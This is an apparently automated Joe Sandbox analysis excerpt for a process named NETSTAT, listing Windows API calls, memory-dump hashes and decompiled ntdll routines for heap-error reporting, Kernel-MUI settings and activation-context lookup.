                                      • Opcode Fuzzy Hash: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
                                      • Instruction Fuzzy Hash: 8EE06D333902143AE22165999C42FABB69CCB81B64F1401A6FA0DEA2C1D995F84146A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: e263a25b9261b4ae8f15824229538849192246319409f3ce42453de4433c6f59
                                      • Instruction ID: 044f4a5319b212ce2576158adb3cbeb21bd265344ecb6e6ee458566231d4db61
                                      • Opcode Fuzzy Hash: e263a25b9261b4ae8f15824229538849192246319409f3ce42453de4433c6f59
                                      • Instruction Fuzzy Hash: 21E0B6B2254009AF8B15DF99ECC1CEB73ADEB8C614B10865DBA5CC7244C634E8268BE5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02AFCFD2,02AFCFD2,?,00000000,?,?), ref: 02B08A90
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 15241e8874b1615c9b4fad18be779d6afb9d84f1cd8090685d1ee0c617134b61
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: 8AE01AB12002086BDB10DF49CC84EE737ADAF88650F018154BE0857242C930E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(02B03546,?,02B03CBF,02B03CBF,?,02B03546,?,?,?,?,?,00000000,00000000,?), ref: 02B088ED
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 284eb86ef48068a9616c7340064237473a87498479912cc0ca649325d94252ac
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: 28E012B1200208ABDB14EF99CC84EA777ADAF88650F118598BE085B282C630F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02AF7C93,?), ref: 02AFD46B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction ID: dc51f19f294ce7cd1097a1e445b148407b56f97d9be28efcbe19f5b54a20e658
                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction Fuzzy Hash: A4D052627903082AEA10AAA89C46F2672C9AB44A44F4940A4FA4AAB2C3EA64E4008561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d960f066d1276f380de9326dfb943f5299e5bca0a7cbf81ad0f58843a66ce877
                                      • Instruction ID: 5431626804bba678107d529d8259a3a622f54cf2d4b59de9873ba4bfdb2db69b
                                      • Opcode Fuzzy Hash: d960f066d1276f380de9326dfb943f5299e5bca0a7cbf81ad0f58843a66ce877
                                      • Instruction Fuzzy Hash: DBB09B719414D5C6D651D7645A087577904BFD4745F16D061D1020641B477CD091F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Strings
                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02F1B305
                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F1B38F
                                      • *** then kb to get the faulting stack, xrefs: 02F1B51C
                                      • The resource is owned shared by %d threads, xrefs: 02F1B37E
                                      • *** Inpage error in %ws:%s, xrefs: 02F1B418
                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02F1B47D
                                      • Go determine why that thread has not released the critical section., xrefs: 02F1B3C5
                                      • The instruction at %p tried to %s , xrefs: 02F1B4B6
                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02F1B484
                                      • read from, xrefs: 02F1B4AD, 02F1B4B2
                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02F1B2DC
                                      • The resource is owned exclusively by thread %p, xrefs: 02F1B374
                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02F1B53F
                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02F1B323
                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02F1B314
                                      • a NULL pointer, xrefs: 02F1B4E0
                                      • The critical section is owned by thread %p., xrefs: 02F1B3B9
                                      • <unknown>, xrefs: 02F1B27E, 02F1B2D1, 02F1B350, 02F1B399, 02F1B417, 02F1B48E
                                      • This failed because of error %Ix., xrefs: 02F1B446
                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02F1B476
                                      • *** enter .exr %p for the exception record, xrefs: 02F1B4F1
                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 02F1B352
                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F1B3D6
                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02F1B2F3
                                      • *** An Access Violation occurred in %ws:%s, xrefs: 02F1B48F
                                      • an invalid address, %p, xrefs: 02F1B4CF
                                      • The instruction at %p referenced memory at %p., xrefs: 02F1B432
                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02F1B39B
                                      • *** enter .cxr %p for the context, xrefs: 02F1B50D
                                      • write to, xrefs: 02F1B4A6
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                      • API String ID: 0-108210295
                                      • Opcode ID: 379476a7af9e24a2c543cc934cd3685568d514826818f1fe6d5d6350bf075713
                                      • Instruction ID: b251b5f7715e76c4b02914a14efc3b1b97e33ba816e5d87c1a5e60b4b95d8168
                                      • Opcode Fuzzy Hash: 379476a7af9e24a2c543cc934cd3685568d514826818f1fe6d5d6350bf075713
                                      • Instruction Fuzzy Hash: E8812435A80220FFEB256F05CC46E6B3F26AF66B99F80D044FA052B152D3A59451DFB2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 44%
                                      			E02F21C06() {
                                      				signed int _t27;
                                      				char* _t104;
                                      				char* _t105;
                                      				intOrPtr _t113;
                                      				intOrPtr _t115;
                                      				intOrPtr _t117;
                                      				intOrPtr _t119;
                                      				intOrPtr _t120;
                                      
                                      				_t105 = 0x2e448a4;
                                      				_t104 = "HEAP: ";
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E02E6B150();
                                      				} else {
                                      					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				_push( *0x2f5589c);
                                      				E02E6B150("Heap error detected at %p (heap handle %p)\n",  *0x2f558a0);
                                      				_t27 =  *0x2f55898; // 0x0
                                      				if(_t27 <= 0xf) {
                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M02F21E96))) {
                                      						case 0:
                                      							_t105 = "heap_failure_internal";
                                      							goto L21;
                                      						case 1:
                                      							goto L21;
                                      						case 2:
                                      							goto L21;
                                      						case 3:
                                      							goto L21;
                                      						case 4:
                                      							goto L21;
                                      						case 5:
                                      							goto L21;
                                      						case 6:
                                      							goto L21;
                                      						case 7:
                                      							goto L21;
                                      						case 8:
                                      							goto L21;
                                      						case 9:
                                      							goto L21;
                                      						case 0xa:
                                      							goto L21;
                                      						case 0xb:
                                      							goto L21;
                                      						case 0xc:
                                      							goto L21;
                                      						case 0xd:
                                      							goto L21;
                                      						case 0xe:
                                      							goto L21;
                                      						case 0xf:
                                      							goto L21;
                                      					}
                                      				}
                                      				L21:
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E02E6B150();
                                      				} else {
                                      					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				_push(_t105);
                                      				E02E6B150("Error code: %d - %s\n",  *0x2f55898);
                                      				_t113 =  *0x2f558a4; // 0x0
                                      				if(_t113 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E02E6B150();
                                      					} else {
                                      						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E02E6B150("Parameter1: %p\n",  *0x2f558a4);
                                      				}
                                      				_t115 =  *0x2f558a8; // 0x0
                                      				if(_t115 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E02E6B150();
                                      					} else {
                                      						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E02E6B150("Parameter2: %p\n",  *0x2f558a8);
                                      				}
                                      				_t117 =  *0x2f558ac; // 0x0
                                      				if(_t117 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E02E6B150();
                                      					} else {
                                      						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E02E6B150("Parameter3: %p\n",  *0x2f558ac);
                                      				}
                                      				_t119 =  *0x2f558b0; // 0x0
                                      				if(_t119 != 0) {
                                      					L41:
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E02E6B150();
                                      					} else {
                                      						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push( *0x2f558b4);
                                      					E02E6B150("Last known valid blocks: before - %p, after - %p\n",  *0x2f558b0);
                                      				} else {
                                      					_t120 =  *0x2f558b4; // 0x0
                                      					if(_t120 != 0) {
                                      						goto L41;
                                      					}
                                      				}
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E02E6B150();
                                      				} else {
                                      					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				return E02E6B150("Stack trace available at %p\n", 0x2f558c0);
                                      			}











                                      0x02f21e2f
                                      0x02f21e39
                                      0x02f21e4a
                                      0x02f21e02
                                      0x02f21e02
                                      0x02f21e08
                                      0x00000000
                                      0x00000000
                                      0x02f21e08
                                      0x02f21e5b
                                      0x02f21e7a
                                      0x02f21e7b
                                      0x02f21e5d
                                      0x02f21e72
                                      0x02f21e77
                                      0x02f21e95

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                      • API String ID: 0-2897834094
                                      • Opcode ID: 566ca9783af84fea25ffd30c5d577d42e06c90b9602520241a4b4ccb095fb5ad
                                      • Instruction ID: 9621bbcc9bb828e5c20b973ee9719120919b714fd98da3c5036110c88e94662d
                                      • Opcode Fuzzy Hash: 566ca9783af84fea25ffd30c5d577d42e06c90b9602520241a4b4ccb095fb5ad
                                      • Instruction Fuzzy Hash: 0561E437AE1178EFD2119B84D489D3373A5E705AF974DE06AFA0EAB203C6749844CE1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E02E73D34(signed int* __ecx) {
                                      				signed int* _v8;
                                      				char _v12;
                                      				signed int* _v16;
                                      				signed int* _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				char _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				signed int* _v48;
                                      				signed int* _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				char _v68;
                                      				signed int _t140;
                                      				signed int _t161;
                                      				signed int* _t236;
                                      				signed int* _t242;
                                      				signed int* _t243;
                                      				signed int* _t244;
                                      				signed int* _t245;
                                      				signed int _t255;
                                      				void* _t257;
                                      				signed int _t260;
                                      				void* _t262;
                                      				signed int _t264;
                                      				void* _t267;
                                      				signed int _t275;
                                      				signed int* _t276;
                                      				short* _t277;
                                      				signed int* _t278;
                                      				signed int* _t279;
                                      				signed int* _t280;
                                      				short* _t281;
                                      				signed int* _t282;
                                      				short* _t283;
                                      				signed int* _t284;
                                      				void* _t285;
                                      
                                      				_v60 = _v60 | 0xffffffff;
                                      				_t280 = 0;
                                      				_t242 = __ecx;
                                      				_v52 = __ecx;
                                      				_v8 = 0;
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_v28 = 0;
                                      				_v32 = 0;
                                      				_v44 = 0;
                                      				_v56 = 0;
                                      				_t275 = 0;
                                      				_v16 = 0;
                                      				if(__ecx == 0) {
                                      					_t280 = 0xc000000d;
                                      					_t140 = 0;
                                      					L50:
                                      					 *_t242 =  *_t242 | 0x00000800;
                                      					_t242[0x13] = _t140;
                                      					_t242[0x16] = _v40;
                                      					_t242[0x18] = _v28;
                                      					_t242[0x14] = _v32;
                                      					_t242[0x17] = _t275;
                                      					_t242[0x15] = _v44;
                                      					_t242[0x11] = _v56;
                                      					_t242[0x12] = _v60;
                                      					return _t280;
                                      				}
                                      				if(E02E71B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                      					_v56 = 1;
                                      					if(_v8 != 0) {
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                      					}
                                      					_v8 = _t280;
                                      				}
                                      				if(E02E71B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                      					_v60 =  *_v8;
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                      					_v8 = _t280;
                                      				}
                                      				if(E02E71B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                      					L16:
                                      					if(E02E71B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                      						L28:
                                      						if(E02E71B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                      							L46:
                                      							_t275 = _v16;
                                      							L47:
                                      							_t161 = 0;
                                      							L48:
                                      							if(_v8 != 0) {
                                      								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                      							}
                                      							_t140 = _v20;
                                      							if(_t140 != 0) {
                                      								if(_t275 != 0) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                      									_t275 = 0;
                                      									_v28 = 0;
                                      									_t140 = _v20;
                                      								}
                                      							}
                                      							goto L50;
                                      						}
                                      						_t167 = _v12;
                                      						_t255 = _v12 + 4;
                                      						_v44 = _t255;
                                      						if(_t255 == 0) {
                                      							_t276 = _t280;
                                      							_v32 = _t280;
                                      						} else {
                                      							_t276 = L02E84620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                      							_t167 = _v12;
                                      							_v32 = _t276;
                                      						}
                                      						if(_t276 == 0) {
                                      							_v44 = _t280;
                                      							_t280 = 0xc0000017;
                                      							goto L46;
                                      						} else {
                                      							E02EAF3E0(_t276, _v8, _t167);
                                      							_v48 = _t276;
                                      							_t277 = E02EB1370(_t276, 0x2e44e90);
                                      							_pop(_t257);
                                      							if(_t277 == 0) {
                                      								L38:
                                      								_t170 = _v48;
                                      								if( *_v48 != 0) {
                                      									E02EABB40(0,  &_v68, _t170);
                                      									if(L02E743C0( &_v68,  &_v24) != 0) {
                                      										_t280 =  &(_t280[0]);
                                      									}
                                      								}
                                      								if(_t280 == 0) {
                                      									_t280 = 0;
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                      									_v44 = 0;
                                      									_v32 = 0;
                                      								} else {
                                      									_t280 = 0;
                                      								}
                                      								_t174 = _v8;
                                      								if(_v8 != 0) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                      								}
                                      								_v8 = _t280;
                                      								goto L46;
                                      							}
                                      							_t243 = _v48;
                                      							do {
                                      								 *_t277 = 0;
                                      								_t278 = _t277 + 2;
                                      								E02EABB40(_t257,  &_v68, _t243);
                                      								if(L02E743C0( &_v68,  &_v24) != 0) {
                                      									_t280 =  &(_t280[0]);
                                      								}
                                      								_t243 = _t278;
                                      								_t277 = E02EB1370(_t278, 0x2e44e90);
                                      								_pop(_t257);
                                      							} while (_t277 != 0);
                                      							_v48 = _t243;
                                      							_t242 = _v52;
                                      							goto L38;
                                      						}
                                      					}
                                      					_t191 = _v12;
                                      					_t260 = _v12 + 4;
                                      					_v28 = _t260;
                                      					if(_t260 == 0) {
                                      						_t275 = _t280;
                                      						_v16 = _t280;
                                      					} else {
                                      						_t275 = L02E84620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                      						_t191 = _v12;
                                      						_v16 = _t275;
                                      					}
                                      					if(_t275 == 0) {
                                      						_v28 = _t280;
                                      						_t280 = 0xc0000017;
                                      						goto L47;
                                      					} else {
                                      						E02EAF3E0(_t275, _v8, _t191);
                                      						_t285 = _t285 + 0xc;
                                      						_v48 = _t275;
                                      						_t279 = _t280;
                                      						_t281 = E02EB1370(_v16, 0x2e44e90);
                                      						_pop(_t262);
                                      						if(_t281 != 0) {
                                      							_t244 = _v48;
                                      							do {
                                      								 *_t281 = 0;
                                      								_t282 = _t281 + 2;
                                      								E02EABB40(_t262,  &_v68, _t244);
                                      								if(L02E743C0( &_v68,  &_v24) != 0) {
                                      									_t279 =  &(_t279[0]);
                                      								}
                                      								_t244 = _t282;
                                      								_t281 = E02EB1370(_t282, 0x2e44e90);
                                      								_pop(_t262);
                                      							} while (_t281 != 0);
                                      							_v48 = _t244;
                                      							_t242 = _v52;
                                      						}
                                      						_t201 = _v48;
                                      						_t280 = 0;
                                      						if( *_v48 != 0) {
                                      							E02EABB40(_t262,  &_v68, _t201);
                                      							if(L02E743C0( &_v68,  &_v24) != 0) {
                                      								_t279 =  &(_t279[0]);
                                      							}
                                      						}
                                      						if(_t279 == 0) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                      							_v28 = _t280;
                                      							_v16 = _t280;
                                      						}
                                      						_t202 = _v8;
                                      						if(_v8 != 0) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                      						}
                                      						_v8 = _t280;
                                      						goto L28;
                                      					}
                                      				}
                                      				_t214 = _v12;
                                      				_t264 = _v12 + 4;
                                      				_v40 = _t264;
                                      				if(_t264 == 0) {
                                      					_v20 = _t280;
                                      				} else {
                                      					_t236 = L02E84620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                      					_t280 = _t236;
                                      					_v20 = _t236;
                                      					_t214 = _v12;
                                      				}
                                      				if(_t280 == 0) {
                                      					_t161 = 0;
                                      					_t280 = 0xc0000017;
                                      					_v40 = 0;
                                      					goto L48;
                                      				} else {
                                      					E02EAF3E0(_t280, _v8, _t214);
                                      					_t285 = _t285 + 0xc;
                                      					_v48 = _t280;
                                      					_t283 = E02EB1370(_t280, 0x2e44e90);
                                      					_pop(_t267);
                                      					if(_t283 != 0) {
                                      						_t245 = _v48;
                                      						do {
                                      							 *_t283 = 0;
                                      							_t284 = _t283 + 2;
                                      							E02EABB40(_t267,  &_v68, _t245);
                                      							if(L02E743C0( &_v68,  &_v24) != 0) {
                                      								_t275 = _t275 + 1;
                                      							}
                                      							_t245 = _t284;
                                      							_t283 = E02EB1370(_t284, 0x2e44e90);
                                      							_pop(_t267);
                                      						} while (_t283 != 0);
                                      						_v48 = _t245;
                                      						_t242 = _v52;
                                      					}
                                      					_t224 = _v48;
                                      					_t280 = 0;
                                      					if( *_v48 != 0) {
                                      						E02EABB40(_t267,  &_v68, _t224);
                                      						if(L02E743C0( &_v68,  &_v24) != 0) {
                                      							_t275 = _t275 + 1;
                                      						}
                                      					}
                                      					if(_t275 == 0) {
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                      						_v40 = _t280;
                                      						_v20 = _t280;
                                      					}
                                      					_t225 = _v8;
                                      					if(_v8 != 0) {
                                      						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                      					}
                                      					_v8 = _t280;
                                      					goto L16;
                                      				}
                                      			}
                                      0x02e73e77
                                      0x02e73e77
                                      0x02e73e7a
                                      0x02e73e7f
                                      0x02e73e8c
                                      0x02e73e8c
                                      0x02e73e91
                                      0x00000000
                                      0x02e73e91

                                      Strings
                                      • Kernel-MUI-Language-SKU, xrefs: 02E73F70
                                      • WindowsExcludedProcs, xrefs: 02E73D6F
                                      • Kernel-MUI-Language-Disallowed, xrefs: 02E73E97
                                      • Kernel-MUI-Number-Allowed, xrefs: 02E73D8C
                                      • Kernel-MUI-Language-Allowed, xrefs: 02E73DC0
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      • Opcode ID: a15b3d421c98e608ea3ba0f0015c01442df2b58b2f364680676af4c9f8adbfae
                                      • Instruction ID: 930e1c05aa089baac94c74486cf5a8069eed4a93be1d37dc965ed21ffbe9443e
                                      • Opcode Fuzzy Hash: a15b3d421c98e608ea3ba0f0015c01442df2b58b2f364680676af4c9f8adbfae
                                      • Instruction Fuzzy Hash: CDF14E72D80218EFCB15DF98C940EEEBBB9FF48754F15906AE509AB250E7359E01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 44%
                                      			E02E98E00(void* __ecx) {
                                      				signed int _v8;
                                      				char _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t32;
                                      				intOrPtr _t35;
                                      				intOrPtr _t43;
                                      				void* _t46;
                                      				intOrPtr _t47;
                                      				void* _t48;
                                      				signed int _t49;
                                      				void* _t50;
                                      				intOrPtr* _t51;
                                      				signed int _t52;
                                      				void* _t53;
                                      				intOrPtr _t55;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t52;
                                      				_t49 = 0;
                                      				_t48 = __ecx;
                                      				_t55 =  *0x2f58464; // 0x74e10110
                                      				if(_t55 == 0) {
                                      					L9:
                                      					if( !_t49 >= 0) {
                                      						if(( *0x2f55780 & 0x00000003) != 0) {
                                      							E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                      						}
                                      						if(( *0x2f55780 & 0x00000010) != 0) {
                                      							asm("int3");
                                      						}
                                      					}
                                      					return E02EAB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                      				}
                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                      				_t43 =  *0x2f57984; // 0x3f2ac8
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                      					if(_t48 == _t43) {
                                      						_t50 = 0x5c;
                                      						if( *_t32 == _t50) {
                                      							_t46 = 0x3f;
                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                      								_t32 = _t32 + 8;
                                      							}
                                      						}
                                      					}
                                      					_t51 =  *0x2f58464; // 0x74e10110
                                      					 *0x2f5b1e0(_t47, _t32,  &_v12);
                                      					_t49 =  *_t51();
                                      					if(_t49 >= 0) {
                                      						L8:
                                      						_t35 = _v12;
                                      						if(_t35 != 0) {
                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                      								E02E99B10( *((intOrPtr*)(_t48 + 0x48)));
                                      								_t35 = _v12;
